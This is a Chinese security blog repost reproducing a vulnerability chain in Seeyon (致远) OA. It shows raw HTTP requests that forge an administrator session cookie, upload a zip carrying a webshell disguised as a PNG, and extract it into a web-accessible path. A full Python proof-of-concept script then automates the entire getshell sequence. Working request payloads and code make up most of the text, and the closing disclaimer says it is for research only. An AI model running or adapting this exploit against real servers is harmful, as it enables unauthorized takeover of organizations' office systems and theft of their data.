致远oa管理员cookie文件上传getshell漏洞复现

admin 2022年6月29日19:03:46安全文章评论59 views3634字阅读12分6秒阅读模式

首先是一个获取管理cookie的漏洞。然后使用管理员权限的cookie上传压缩文件进行解压,才能达到getshell的目的

POST /seeyon/thirdpartyController.do HTTP/1.1Host: x.x.x.xUser-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 133Content-Type: application/x-www-form-urlencoded
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

然后上传压缩包,记得修改cookie,每个管理员cookie只能使用一次。这里说明一下,这个压缩包里,包含的是我们的webshell。

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1Host:x.x.x.xConnection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.25.1Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5Content-Length: 841Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="firstSave"
true--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="callMethod"
resizeLayout--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="isEncrypt"
0--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="takeOver"
false--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="type"
0--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="file1"; filename="11.png"Content-Type: image/png
111--59229605f98b8cf290a7b8908b34616b--

然后解压,然后访问/seeyon/common/designer/pageLayout/a2345678.jsp

POST /seeyon/ajax.do HTTP/1.1Host: x.x.x.xUser-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedCookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913Content-Length: 157
method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-10%22%2C%225818374431215601542%22%5D

最后说明一下,你上传文件上去后,记得修改你解压路径,比如,D:\Seeyou\A8\base\upload\2021\04\09\文件名,然后再提交解压申请。

致远oa管理员cookie文件上传getshell漏洞复现

直接用web后台传总是显示上传中,也不知道为啥,希望大佬来解决。


下面是python完整POC:

import requestsimport reimport time
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}

def seeyon_new_rce(targeturl): orgurl = targeturl
# 通过请求直接获取管理员权限cookie targeturl = orgurl + 'seeyon/thirdpartyController.do' post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"} response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False) rsp = "" if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): cookies = response.cookies cookies = requests.utils.dict_from_cookiejar(cookies) # 上传压缩文件 aaa=cookies['JSESSIONID'] print(aaa) targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload' files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))] print() headers = {'Cookie':"JSESSIONID=%s"%aaa} data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 'isEncrypt': "0"} response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False) if response.text: reg = re.findall('fileurls=fileurls+","+'(.+)'',response.text,re.I) print(reg) if len(reg)==0: exit("匹配失败") fileid=reg[0] targeturl = orgurl + 'seeyon/ajax.do' datestr = time.strftime('%Y-%m-%d') post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D' #headers = {'Cookie': cookies} headers['Content-Type']="application/x-www-form-urlencoded" response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False) print(response.text)
seeyon_new_rce("url")

这个压缩包得自己生成了。压缩包里面一定得带有layout.xml  这个文件。空文件也行

例如这样的

致远oa管理员cookie文件上传getshell漏洞复现

他们是在一个压缩包里的!,想要压缩包后台回复:致远

原文始发于微信公众号(Qingy之安全):致远oa管理员cookie文件上传getshell漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月29日19:03:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  致远oa管理员cookie文件上传getshell漏洞复现 http://cn-sec.com/archives/787267.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: